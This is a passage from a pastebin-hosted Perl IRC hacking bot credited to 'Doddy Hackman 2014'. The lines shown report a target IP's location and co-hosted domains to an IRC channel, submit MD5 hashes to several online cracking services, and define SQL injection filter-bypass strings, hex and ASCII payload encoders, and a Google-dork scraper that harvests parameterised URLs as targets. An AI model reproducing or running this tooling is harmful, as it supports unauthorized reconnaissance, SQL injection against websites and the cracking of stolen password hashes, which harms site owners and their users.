  844. print $soquete "PRIVMSG $canal : [+] Getting info\r\n";
  845.  
  846. $total =
  847. "http://www.melissadata.com/lookups/iplocation.asp?ipaddress=$target";
  848. $re = toma($total);
  849.  
  850. if ( $re =~ /City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
  851. print $soquete "PRIVMSG $canal : [+] City : $2\r\n";
  852. }
  853. else {
  854. print $soquete "PRIVMSG $canal : [-] Not Found\r\n";
  855. }
  856. if ( $re =~ /Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
  857. print $soquete "PRIVMSG $canal : [+] Country : $2\r\n";
  858. }
  859. if ( $re =~
  860. /State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ )
  861. {
  862. print $soquete "PRIVMSG $canal : [+] State or Region : $2\r\n";
  863.  
  864. }
  865.  
  866. print $soquete "PRIVMSG $canal : [+] Getting Hosts\r\n";
  867.  
  868. my $code = toma( "http://www.ip-adress.com/reverse_ip/" . $target );
  869.  
  870. while ( $code =~ /whois\/(.*?)\">Whois/g ) {
  871. my $dns = $1;
  872. chomp $dns;
  873. print $soquete "PRIVMSG $canal : [DNS] : $dns\r\n";
  874.  
  875. }
  876. }
  877. }
  878.  
  879. } #
  880.  
  881. # Functions
  882.  
  883. sub crackit {
  884.  
  885. my $md5 = shift;
  886. my $resultado;
  887.  
  888. ## www.md5.net
  889.  
  890. my $code = tomar(
  891. "http://www.md5.net/cracker.php",
  892. { 'hash' => $md5, 'submit' => 'Crack' }
  893. );
  894.  
  895. if ( $code =~ m{<input type="text" id="hash" size="(.*?)" value="(.*?)"/>}
  896. and $code !~ /Entry not found./mig )
  897. {
  898.  
  899. $resultado = $2;
  900.  
  901. }
  902. else {
  903.  
  904. ## md5online.net
  905.  
  906. my $code = tomar( "http://md5online.net/index.php",
  907. { 'pass' => $md5, 'option' => 'hash2text', 'send' => 'Submit' } );
  908.  
  909. if ( $code =~
  910. /<center><p>md5 :<b>(.*?)<\/b> <br>pass : <b>(.*?)<\/b><\/p>/ )
  911. {
  912. $resultado = $2;
  913. }
  914. else {
  915.  
  916. ## md5decryption.com
  917.  
  918. my $code = tomar(
  919. "http://md5decryption.com/index.php",
  920. { 'hash' => $md5, 'submit' => 'Decrypt It!' }
  921. );
  922.  
  923. if ( $code =~ /Decrypted Text: <\/b>(.*?)<\/font>/ ) {
  924. $resultado = $1;
  925. }
  926. else {
  927.  
  928. ## md5.my-addr.com
  929.  
  930. my $code = tomar(
  931. "http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php",
  932. { 'md5' => $md5 }
  933. );
  934.  
  935. if ( $code =~
  936. /<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>/
  937. )
  938. {
  939. $resultado = $1;
  940. }
  941. else {
  942. $resultado = "false01";
  943. }
  944. }
  945. }
  946. }
  947. return $resultado;
  948. }
  949.  
  950. sub bypass {
  951. if ( $_[0] eq "/*" ) { return ( "/**/", "/*" ); }
  952. elsif ( $_[0] eq "%20" ) { return ( "%20", "%00" ); }
  953. else { return ( "+", "--" ); }
  954. }
  955.  
  956. sub ascii {
  957. return join ',', unpack "U*", $_[0];
  958. }
  959.  
  960. sub ascii_de {
  961. $_[0] = join q[], map { chr } split q[,], $_[0];
  962. return $_[0];
  963. }
  964.  
  965. sub encode {
  966. my $string = $_[0];
  967. $hex = '0x';
  968. for ( split //, $string ) {
  969. $hex .= sprintf "%x", ord;
  970. }
  971. return $hex;
  972. }
  973.  
  974. sub decode {
  975. $_[0] =~ s/^0x//;
  976. $encode = join q[], map { chr hex } $_[0] =~ /../g;
  977. return $encode;
  978. }
  979.  
  980. sub google {
  981. my ( $a, $b ) = @_;
  982. for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) {
  983. $code = toma(
  984. "http://www.google.com.ar/search?hl=&q=" . $a . "&start=$pages" );
  985. my @links = get_links($code);
  986. for my $l (@links) {
  987. if ( $l =~ /webcache.googleusercontent.com/ ) {
  988. push( @url, $l );
  989. }
  990. }
  991. }
  992. for (@url) {
  993. if ( $_ =~ /cache:(.*?):(.*?)\+/ ) {
  994. push( @founds, $2 );
  995. }
  996. }
  997. my @founds = repes( cortar(@founds) );
  998. return @founds;
  999. }
  1000.  
  1001. sub repes {
  1002. my @limpio;
  1003. foreach $test (@_) {
  1004. push @limpio, $test unless $repe{$test}++;
  1005. }
  1006. return @limpio;
  1007. }
  1008.  
  1009. sub cortar {
  1010. my @nuevo;
  1011. for (@_) {
  1012. if ( $_ =~ /=/ ) {
  1013. @tengo = split( "=", $_ );
  1014. push( @nuevo, @tengo[0] . "=" );
  1015. }
  1016. else {
  1017. push( @nuevo, $_ );
  1018. }
  1019. }
  1020. return @nuevo;
  1021. }
  1022.  
  1023. sub get_links {
  1024. $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] );
  1025. return @links;
  1026.  
  1027. sub agarrar {
  1028. my ( $a, %b ) = @_;
  1029. push( @links, values %b );
  1030. }
  1031. }
  1032.  
  1033. sub toma {
  1034. return $nave->get( $_[0] )->content;
  1035. }
  1036.  
  1037. sub tomar {
  1038. my ( $web, $var ) = @_;
  1039. return $nave->post( $web, [ %{$var} ] )->content;
  1040. }
  1041.  
  1042. sub tomados {
  1043. return $nave->get( $_[0] );
  1044. }
  1045.  
  1046. sub tomax {
  1047. return $nave->get( $_[0] );
  1048. }
  1049.  
  1050. sub savefile {
  1051. open( SAVE, ">>" . $_[0] );
  1052. print SAVE $_[1] . "\n";
  1053. close SAVE;
  1054. }
  1055.  
  1056. sub abrir {
  1057. open my $FILE, q[<], "config.txt";
  1058. my $word = join q[], <$FILE>;
  1059. close $FILE;
  1060. return $word;
  1061. }
  1062.  
  1063. sub head {
  1064. print qq(
  1065.  
  1066.  
  1067.  
  1068. );
  1069. }
  1070.  
  1071. sub copyright {
  1072. print "\n\n-- == (C) Doddy Hackman 2014 == --\n\n";
  1073. }
  1074.  
  1075. # The End ?
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!